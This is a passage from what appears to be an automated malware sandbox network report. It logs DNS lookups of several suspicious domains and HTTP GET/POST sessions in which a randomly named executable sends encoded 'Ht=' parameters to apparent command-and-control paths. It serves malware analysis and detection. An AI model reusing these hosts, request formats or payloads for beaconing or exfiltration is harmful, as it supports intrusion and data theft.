                                                          Nov 15, 2024 09:33:27.163810015 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.170869112 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.171087980 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.180752993 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.185682058 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.864753008 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.903640032 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.903700113 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:28.691580057 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.717299938 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.722407103 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:29.722522020 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.743107080 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.747992039 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:29.748136997 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:30.422269106 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:30.460450888 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:30.460915089 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:31.254127026 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.272636890 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.278243065 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.278328896 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.284755945 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.289740086 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.941217899 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.980036974 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.980412960 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.983222961 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.988334894 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:38.035048962 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:38.039952993 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.040142059 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:38.051337957 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:38.056505919 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.725321054 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.762579918 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.762774944 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:39.566742897 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:40.584784031 CET5000780192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:40.589751005 CET8050007162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:40.589847088 CET5000780192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:40.598639965 CET5000780192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:40.603600025 CET8050007162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:41.270337105 CET8050007162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:41.308202982 CET8050007162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:41.308299065 CET5000780192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:42.113477945 CET5000780192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:43.132349014 CET5000880192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:43.137197018 CET8050008162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:43.139761925 CET5000880192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:43.149660110 CET5000880192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:43.154609919 CET8050008162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:43.154623032 CET8050008162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:43.809772015 CET8050008162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:43.847949028 CET8050008162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:43.848067045 CET5000880192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:44.660377979 CET5000880192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:45.678605080 CET5000980192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:45.683619022 CET8050009162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:45.683691025 CET5000980192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:45.690406084 CET5000980192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:45.695306063 CET8050009162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:46.350785017 CET8050009162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:46.389084101 CET8050009162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:46.389246941 CET5000980192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:46.390650034 CET5000980192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:46.395514011 CET8050009162.0.211.143192.168.2.11

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 15, 2024 09:31:54.406953096 CET6169653192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:31:54.430666924 CET53616961.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:31:59.455307007 CET6065453192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:31:59.673063040 CET53606541.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:32:15.789963961 CET5191253192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:32:15.824846029 CET53519121.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:32:29.418086052 CET6425053192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:32:29.481621027 CET53642501.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:32:43.149343967 CET6194453192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:32:43.508485079 CET53619441.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:32:56.758553982 CET5379553192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:32:56.787311077 CET53537951.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:33:10.188607931 CET5865253192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:33:10.824460030 CET53586521.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:33:24.601080894 CET5968453192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:33:24.615907907 CET53596841.1.1.1192.168.2.11
                                                          Nov 15, 2024 09:33:37.992527962 CET6203753192.168.2.111.1.1.1
                                                          Nov 15, 2024 09:33:38.031513929 CET53620371.1.1.1192.168.2.11

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 15, 2024 09:31:54.406953096 CET192.168.2.111.1.1.10xea95Standard query (0)www.tangible.onlineA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:31:59.455307007 CET192.168.2.111.1.1.10x5243Standard query (0)www.tesetturhanzade.xyzA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:15.789963961 CET192.168.2.111.1.1.10x3b28Standard query (0)www.kantinestoel.onlineA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:29.418086052 CET192.168.2.111.1.1.10xfb6aStandard query (0)www.deeplungatlas.orgA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:43.149343967 CET192.168.2.111.1.1.10xb11cStandard query (0)www.ultrawin23.shopA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:56.758553982 CET192.168.2.111.1.1.10x24edStandard query (0)www.sonoscan.orgA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:33:10.188607931 CET192.168.2.111.1.1.10xa5beStandard query (0)www.zz67x.topA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:33:24.601080894 CET192.168.2.111.1.1.10x6726Standard query (0)www.omnibizlux.bizA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:33:37.992527962 CET192.168.2.111.1.1.10x5e53Standard query (0)www.vibixx.siteA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 15, 2024 09:31:54.430666924 CET1.1.1.1192.168.2.110xea95Name error (3)www.tangible.onlinenonenoneA (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:31:59.673063040 CET1.1.1.1192.168.2.110x5243No error (0)www.tesetturhanzade.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 15, 2024 09:31:59.673063040 CET1.1.1.1192.168.2.110x5243No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 15, 2024 09:31:59.673063040 CET1.1.1.1192.168.2.110x5243No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:15.824846029 CET1.1.1.1192.168.2.110x3b28No error (0)www.kantinestoel.onlinekantinestoel.onlineCNAME (Canonical name)IN (0x0001)false
                                                          Nov 15, 2024 09:32:15.824846029 CET1.1.1.1192.168.2.110x3b28No error (0)kantinestoel.online91.184.0.200A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:29.481621027 CET1.1.1.1192.168.2.110xfb6aNo error (0)www.deeplungatlas.org194.9.94.86A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:29.481621027 CET1.1.1.1192.168.2.110xfb6aNo error (0)www.deeplungatlas.org194.9.94.85A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:43.508485079 CET1.1.1.1192.168.2.110xb11cNo error (0)www.ultrawin23.shopultrawin23.shopCNAME (Canonical name)IN (0x0001)false
                                                          Nov 15, 2024 09:32:43.508485079 CET1.1.1.1192.168.2.110xb11cNo error (0)ultrawin23.shop170.39.213.43A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:56.787311077 CET1.1.1.1192.168.2.110x24edNo error (0)www.sonoscan.org13.248.169.48A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:32:56.787311077 CET1.1.1.1192.168.2.110x24edNo error (0)www.sonoscan.org76.223.54.146A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:33:10.824460030 CET1.1.1.1192.168.2.110xa5beNo error (0)www.zz67x.topzz67x.topCNAME (Canonical name)IN (0x0001)false
                                                          Nov 15, 2024 09:33:10.824460030 CET1.1.1.1192.168.2.110xa5beNo error (0)zz67x.top38.47.232.194A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:33:24.615907907 CET1.1.1.1192.168.2.110x6726No error (0)www.omnibizlux.biz167.172.133.32A (IP address)IN (0x0001)false
                                                          Nov 15, 2024 09:33:38.031513929 CET1.1.1.1192.168.2.110x5e53No error (0)www.vibixx.site162.0.211.143A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.tesetturhanzade.xyz
                                                          • www.kantinestoel.online
                                                          • www.deeplungatlas.org
                                                          • www.ultrawin23.shop
                                                          • www.sonoscan.org
                                                          • www.zz67x.top
                                                          • www.omnibizlux.biz
                                                          • www.vibixx.site

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.114998185.159.66.93803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:31:59.701544046 CET331OUTGET /ur0f/?Ht=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiOLfy4lE5d8KH961FjyGPsNNV+mrO2nqMYXA=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.tesetturhanzade.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:00.585974932 CET225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Fri, 15 Nov 2024 08:32:00 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-11-15T08:32:05.4402834Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.114998291.184.0.200803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:15.845979929 CET609OUTPOST /ggvc/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kantinestoel.online
                                                          Origin: http://www.kantinestoel.online
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.kantinestoel.online/ggvc/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 31 37 34 43 59 47 45 39 59 37 6d 7a 46 62 31 49 50 7a 6a 41 2f 79 77 48 49 56 79 41 4c 32 78 67 58 77 3d 3d
                                                          Data Ascii: Ht=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq174CYGE9Y7mzFb1IPzjA/ywHIVyAL2xgXw==
                                                          Nov 15, 2024 09:32:16.643704891 CET500INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:16 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.114998391.184.0.200803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:18.382411957 CET629OUTPOST /ggvc/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kantinestoel.online
                                                          Origin: http://www.kantinestoel.online
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.kantinestoel.online/ggvc/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 74 53 33 69 30 6f 4f 32 74 33 55 41 55 48 63 34 63 35 47 66 70 67 65 65 46 45 7a 63 56 4d 69 56 37 76 49 71 76 6e 50 58 69 49 37 38 59 64 41 5a 64 4f 4c 74 31 43 56 61 56 59 58 4a 31 55 53 77 45 56 55 75 6e 4d 57 73 68 35 36 76 5a 63 6f 4a 64 64 56 68 45 42 44 4e 77 62 76 38 47 53 38 59 52 70 66 53 65 49 72 45 59 79 79 51 43 49 6f 47 73 68 4e 6a 62 43 4c 57 57 6c 6f 2b 42 48 41 48 52 66 4d 43 6e 76 54 67 6b 54 77 77 38 6d 54 4f 4a 2b 36 6c 78 6f 4e 6b 61 6c 4e 56 51 72 6d 4f 4a 39 34 53 66 51 71 58 38 68 34 46 63 7a 54 77 43 48 55 70 4d 39 70 56 47 31 51 75 77 54 34 46 7a 6f 78 65 32 75 33 34 45 61 34 3d
                                                          Data Ascii: Ht=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVMiV7vIqvnPXiI78YdAZdOLt1CVaVYXJ1USwEVUunMWsh56vZcoJddVhEBDNwbv8GS8YRpfSeIrEYyyQCIoGshNjbCLWWlo+BHAHRfMCnvTgkTww8mTOJ+6lxoNkalNVQrmOJ94SfQqX8h4FczTwCHUpM9pVG1QuwT4Fzoxe2u34Ea4=
                                                          Nov 15, 2024 09:32:19.221623898 CET500INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:19 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.114998491.184.0.200803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:20.934016943 CET1642OUTPOST /ggvc/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kantinestoel.online
                                                          Origin: http://www.kantinestoel.online
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.kantinestoel.online/ggvc/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 74 53 33 69 30 6f 4f 32 74 33 55 41 55 48 63 34 63 35 47 66 70 67 65 65 46 45 7a 63 56 4d 36 56 36 61 55 71 31 41 62 58 6a 49 37 38 62 64 41 63 64 4f 4b 33 31 42 6c 65 56 59 72 33 31 52 65 77 46 32 63 75 68 35 32 73 72 35 36 76 62 63 6f 49 41 4e 56 4f 45 42 54 4a 77 61 44 38 47 53 38 59 52 76 37 53 4f 4b 54 45 4c 69 79 50 53 59 6f 77 39 78 4d 45 62 42 36 72 57 6c 73 45 42 32 67 48 57 2f 63 43 6c 5a 50 67 76 54 77 79 37 6d 54 57 4a 2b 33 6c 78 73 74 2f 61 6d 51 64 51 70 6d 4f 59 72 55 4d 47 45 2b 74 6d 67 38 52 4c 67 37 78 4a 33 59 63 49 50 35 6f 58 77 51 69 73 32 6c 55 33 4e 63 6b 6a 75 50 76 52 66 5a 64 62 2f 6e 37 6c 48 4b 58 6b 61 49 43 6a 38 36 51 67 67 42 37 31 6f 71 68 73 51 38 39 42 74 73 54 67 77 4d 6f 30 74 41 4d 6c 58 66 4c 42 33 6e 77 6d 6d 51 38 6b 38 52 64 73 43 74 4c 70 35 7a 6a 52 33 4b 38 65 67 47 42 73 54 59 58 74 6c 49 6e 31 61 45 62 43 55 78 34 69 4c 32 76 63 6c 31 4b 61 30 57 4d 36 54 4e 69 50 50 5a 6b 47 34 5a 72 46 48 6c 54 4f 77 50 [TRUNCATED]
                                                          Data Ascii: Ht=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVM6V6aUq1AbXjI78bdAcdOK31BleVYr31RewF2cuh52sr56vbcoIANVOEBTJwaD8GS8YRv7SOKTELiyPSYow9xMEbB6rWlsEB2gHW/cClZPgvTwy7mTWJ+3lxst/amQdQpmOYrUMGE+tmg8RLg7xJ3YcIP5oXwQis2lU3NckjuPvRfZdb/n7lHKXkaICj86QggB71oqhsQ89BtsTgwMo0tAMlXfLB3nwmmQ8k8RdsCtLp5zjR3K8egGBsTYXtlIn1aEbCUx4iL2vcl1Ka0WM6TNiPPZkG4ZrFHlTOwP+MNFfxK8n6LOycH00jDowGSIU81/Rtus1dyyd3bs7546E8HUD/spAFXXVLjj5zMGvndRsMuCtHW3hnu739XW9HYaU656g55Ofi/hjFrzqS7gDcnq+LGzpAR753MZZVe5OqRC/f1EC43yHIYBW1oITf6kM7FeRSygoDN8g6O8X21bJBlsoG4IOOCc+vpXfxOP4qhfQfadBq4MaJw4Hz1J40Zv1ez02h/cg50ix5iKN2n6QfC86CBnRH0PSBcgAV6S+Fz8Ix1WJxqqy5nxZkXwy69KwXTiYxDOaVWeBoSEHbB6gQuRB2aJFz1g8C8Xy9FUOBh2YDVnfftLip4wWAitKd29c0oi0XzDgFN5ONt5GVulkIlSAUYcM6V5mX6UAP0NP4VEXCOF8eC7jOg7LEEENRyC+FeuDX/s0S/5ttJXRXq0trHtNGqDcUwlwMemtMvJs49mVZAbLCMGUAoY/ovVwuDZ2Fp+6jLPP7juwyUOxhcDUxQERxAtAJe1crUOn7D+TWOjNc0HBsHIpxTGrMW0xQXglIg+LsNFC05laBC19hHIo8TgY+UVCaxHUw90QcC9+kc//x3xpaX+V/D6/5TmeI+Fi4YUYEU/T83vLNDCfzIAnlj1Z6dT1Ng2IdV97IW2saY//0FZsHuZSfXRAklgAxGU0ARhVsML7P [TRUNCATED]
                                                          Nov 15, 2024 09:32:21.758438110 CET500INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:21 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.114998591.184.0.200803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:23.478744984 CET331OUTGET /ggvc/?VRvXS=WfxxDba8X&Ht=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1sK6ZXv4UHMlnEy7R+vzIZHc2JfvRSKbgShg= HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.kantinestoel.online
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:24.292563915 CET500INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:24 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.1149986194.9.94.86803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
